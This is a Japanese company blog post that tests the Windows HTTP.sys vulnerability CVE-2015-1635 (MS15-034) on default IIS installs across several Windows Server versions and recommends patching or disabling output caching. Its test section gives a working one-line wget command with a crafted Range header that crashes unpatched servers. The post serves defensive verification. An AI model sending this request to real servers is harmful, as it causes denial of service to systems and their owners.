来週の人間ドックのが個人的には恐ろしいけど
しれと同じくらい深刻な脆弱性がWindowsサーバで4/16に発表されました。
少し興味があったのでパッチ適用しないとどうなるかを検証してみました。
結論からWindows Server 2008 R2以降のOSで
IISをデフォルトで設定している場合は簡単に攻撃が成功してしまいます。
攻撃が成功するとサーバの停止が発生します。
■検証環境
Windows Server 2003 R2
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
※全てIISをデフォルト設定で設定
■検証方法
Linuxサーバから下記コマンドを実行
wget --header="Range: bytes=18-18446744073709551615" [対象サイト]/welcome.png
■対策
MS15-034を適用(要再起動)
またはIISのみの対策として出力キャッシュを無効にする事でも本件は回避できますが
パフォーマンス影響等が出る可能性ありますので出来ればMS15-034の適用を推奨します。
投稿者プロフィール
-
2014年6月からスカイアーチに入社しました新入りのおっさんです。
雑食な性格ですのでその時の気分で記事を投稿していきたいと思います。
最新の投稿
負荷試験2015年12月15日Jmeterを使用した負荷試験でのちょっとした注意点
Windows2015年4月20日Windowsサーバーの脆弱性について検証してみた(CVE-2015-1635)
Linux2015年1月28日glibc脆弱性(GHOST) CVE-2015-0235のご連絡
AWS2014年9月18日Windows Server 2008 on AWS ~時刻同期の罠~
